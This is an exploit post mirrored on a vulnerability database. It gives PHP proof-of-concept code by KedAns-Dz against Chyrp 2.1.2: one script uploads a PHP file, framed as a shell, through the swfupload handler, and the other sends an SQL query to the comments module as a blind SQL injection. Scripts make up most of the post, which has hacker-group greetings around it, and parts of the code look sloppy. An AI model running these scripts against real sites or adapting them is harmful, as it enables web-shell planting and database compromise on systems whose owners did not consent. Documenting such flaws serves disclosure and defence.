Lucene search
K

Chyrp 2.1.2 SQL Injection / Shell Upload

🗓️ 13 Jul 2012 00:00:00Reported by KedAns-DzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Chyrp 2.1.2 SQL Injection / Shell Upload, Multiple Vulnerabilities, PH

Code
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : Chyrp v2.1.2 <= (FU/BSQLi) Multiple Vulnerabilities  
# Author : KedAns-Dz  
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com | www.inj3ct0rs.com  
# FaCeb0ok : http://fb.me/Inj3ct0rK3d  
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com  
# platform : php  
# Type : Multiple Vulnerabilities  
# Tested on : Windows XP-SP3 (Fr)  
# Download : [http://chyrp.net/releases/chyrp_v2.1.2.zip]  
###  
  
# <3 <3 Greetings t0 Palestine <3 <3  
# Happy 50 Year's in Independence All Algerians <3 <3  
----neXt-->  
# SELECT From _K3d @Welc0m BaCk All Inj3ct0r's ^_^ :D  
# 2 AND 0=' s0 Use DDos LamErZ_Kid'Z - Big F^ n00b's--  
  
# Exploit's / p0c's ====>  
  
### ./Explo8-(1) Upload File/ShelL *.* => ###  
  
<?php  
  
$headers = array("Content-Type: application/octet-stream",  
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"k3d.php\"");  
  
$uploadfile="<?php phpinfo(); ?>"; # U'r Sh3lL h3re !  
  
$ch = curl_init("http://[target]/modules/swfupload/upload_handler.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
  
?>  
  
### ./Explo8-(2) Blind SQL Injection => ###  
  
<?php  
$bsqli =  
curl_init("http://[Target]/modules/comments/comments.php");  
curl_setopt($bsqli, CURLOPT_POST, true);  
curl_setopt($bsqli, CURLOPT_POSTFIELDS,  
array('query'=>"SELECT (0,@@VERSION)--")); # Blind SQLi h3rE !  
curl_setopt($bsqli, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($bsqli);  
curl_close($bsqli);  
print "$postResult";  
?>  
  
#### << ThE|End , Good LuCk All ^_^ !  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w  
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)  
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection  
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke  
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ  
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs  
#============================================================================================================`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation